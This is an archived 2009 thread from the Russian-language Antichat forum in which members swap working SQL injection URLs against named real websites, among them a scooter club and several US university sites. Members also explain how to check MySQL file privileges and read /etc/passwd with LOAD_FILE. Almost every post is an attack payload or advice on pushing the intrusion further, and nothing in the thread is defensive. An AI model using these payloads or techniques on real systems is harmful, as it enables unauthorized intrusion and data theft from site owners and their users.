ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #5561  
Старый 20.02.2009, 00:01
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

u36a,

Код:
http://scooter-club.ru/index.php?content=yes&page_id=-49+union+select+1,version()/*
 

  #5562  
Старый 20.02.2009, 00:02
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

http://scooter-club.ru/index.php?content=yes&page_id=-1+union+select+1,database()+/*
__________________
Появляюсь редко. Важные дела в реале.
 

  #5563  
Старый 20.02.2009, 00:10
u36a
Познающий
Регистрация: 18.11.2008
Сообщений: 53
Провел на форуме:
170968

Репутация: 10
Отправить сообщение для u36a с помощью ICQ
По умолчанию

А есть ли возможность посмотреть присутствует ли file_priv у данного пользователя?
 

  #5564  
Старый 20.02.2009, 00:14
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

если доступа к mysql.user нет - то скорей всего file_priv нет. А если есть доступ то запрашиваешь колонку file_priv из таблицы mysql.user - если Y -то есть, если N - то нет
 

  #5565  
Старый 20.02.2009, 00:16
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

u36a, возможность есть. в твоем случает file_priv не присутствует
https://forum.antichat.ru/showpost.php?p=942609&postcount=34
вот тут все описано, не буду цитировать.

Последний раз редактировалось faza02; 20.02.2009 в 00:20..
 

  #5566  
Старый 20.02.2009, 00:16
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

u36a, сделай в поле вывода LOAD_FILE('/etc/passwd') если сервак юниксовый... при наличии файлприва получишь содержимое, при отсутствии - или пустоту или ошибки... Ну в общем вывода не будет...
 

  #5567  
Старый 20.02.2009, 00:24
joomler
Новичок
Регистрация: 19.02.2009
Сообщений: 25
Провел на форуме:
57669

Репутация: 10
По умолчанию

спасибо , счас почитаю)))))
 

  #5568  
Старый 20.02.2009, 00:24
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Цитата:
Сообщение от faza02  
https://forum.antichat.ru/showpost.php?p=942609&postcount=34
вот тут все описано, не буду цитировать.
Помимо там описанного не забываем так же о табличке user_privileges из information_schema.

SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%username%'

u36a, но в твоем случае это не прокатит т.к. версия 4.1. Заюзай вариант с LOAD_FILE, как уже было предложено
 

  #5569  
Старый 20.02.2009, 02:43
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

что то у меня не получается)
http://studorgs.bowdoin.edu/meddies/members.php?mid=-27+or+1=1/*
http://cyberbuzz.gatech.edu/ice_hockey/news.php?nid=-4+or+1=1/*&PHPSESSID=8021c6f2f9284e9566bd87b298ef8f30
http://ext.wsu.edu/pnn/user/viewNotification.php?nid=-2007-326+or+1=1--
http://studorgs.bowdoin.edu/meddies/news.php?nid=-10+or+1=1/*
http://www.umass.edu/research/rld/bioportal/viewfac.php?fid=-79+or+1=1/*

Последний раз редактировалось sabe; 20.02.2009 в 03:03..
 

  #5570  
Старый 20.02.2009, 02:51
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

http://www.mgv.edu/view_news.php?nid=-1+union+select+1,version(),3,4--
а в чем проблема?
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ